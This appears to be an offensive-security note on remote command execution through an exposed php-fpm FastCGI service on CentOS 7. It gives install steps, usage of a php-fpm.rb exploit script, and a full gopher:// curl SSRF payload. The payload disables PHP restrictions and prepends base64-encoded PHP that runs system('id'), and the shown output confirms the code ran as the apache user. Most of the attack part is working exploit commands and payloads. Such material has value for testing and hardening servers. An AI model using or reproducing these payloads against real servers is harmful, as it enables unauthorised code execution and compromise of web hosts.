php-fpm Command execution

Tested on
- CentOS Linux release 7.8.2003 (Core)
- php-fpm: Default install

References:
- https://nealpoole.com/blog/2011/04/setting-up-php-fastcgi-and-nginx-dont-trust-the-tutorials-check-your-configuration/
- https://joner11234.github.io/article/9897b513.html -: SSRF series attack FastCGI
- https://cxsecurity.com/issue/WLB-2013010139 -: (PHP-FPM universal SSRF bypass script, ./php-fpm.rb)
===============================================================================

Install php-fpm
----------------------------------------------------
yum install epel-release yum-utils
yum install http://rpms.remirepo.net/enterprise/remi-release-7.rpm
yum-config-manager --enable remi-php73

yum install php-fpm
systemctl start php-fpm

Execute commands
--------------------------------------------------
Usage: ./php-fpm.rb ( -u /path/to/socket | addr port ) [ /path/to/any/exists/file.php ] 'some php code to execute'


Session:
==================================================
./php-fpm.rb 127.0.0.1 9000 /opt/rh/devtoolset-9/root/usr/share/systemtap/examples/apps/hello.php 'system("id");'

Sending Request to => 127.0.0.1 port 9000

@Passing INI directive through FastCGI: unable to set 'safe_mode'▒X-Powered-By: PHP/7.3.26
Content-type: text/html; charset=UTF-8

uid=48(apache) gid=48(apache) groups=48(apache),993(nagios) context=system_u:system_r:httpd_t:s0
echo "Hello World!";

Using curl:
=============================================

curl 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%7f%07%00%0b%80%00%00%09%53%45%52%56%45%52%5f%4e%41%4d%45%6c%6f%63%61%6c%68%6f%73%74%0e%80%00%00%03%52%45%51%55%45%53%54%5f%4d%45%54%48%4f%44%47%45%54%0f%80%00%00%45%53%43%52%49%50%54%5f%46%49%4c%45%4e%41%4d%45%2f%6f%70%74%2f%72%68%2f%64%65%76%74%6f%6f%6c%73%65%74%2d%39%2f%72%6f%6f%74%2f%75%73%72%2f%73%68%61%72%65%2f%73%79%73%74%65%6d%74%61%70%2f%65%78%61%6d%70%6c%65%73%2f%61%70%70%73%2f%68%65%6c%6c%6f%2e%70%68%70%0f%80%00%00%e3%50%48%50%5f%41%44%4d%49%4e%5f%56%41%4c%55%45%61%6c%6c%6f%77%5f%75%72%6c%5f%66%6f%70%65%6e%3d%4f%6e%0a%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%4f%6e%0a%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%4f%66%66%0a%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%4f%66%66%0a%64%69%73%70%6c%61%79%5f%65%72%72%6f%72%73%3d%4f%6e%0a%73%61%66%65%5f%6d%6f%64%65%3d%4f%66%66%0a%73%68%6f%72%74%5f%6f%70%65%6e%5f%74%61%67%3d%4f%6e%0a%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%64%61%74%61%3a%2c%25%33%63%25%33%66%25%32%30%65%76%61%6c%25%32%38%62%61%73%65%36%34%5f%64%65%63%6f%64%65%25%32%38%25%32%32%63%33%6c%7a%64%47%56%74%4b%43%4a%70%5a%43%49%70%4f%77%25%33%64%25%33%64%25%32%32%25%32%39%25%32%39%25%33%66%25%33%65%00%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%00%00%00' -o -
@Passing INI directive through FastCGI: unable to set 'safe_mode'▒X-Powered-By: PHP/7.3.26
Content-type: text/html; charset=UTF-8

uid=48(apache) gid=48(apache) groups=48(apache),993(nagios) context=system_u:system_r:httpd_t:s0
echo "Hello World!";


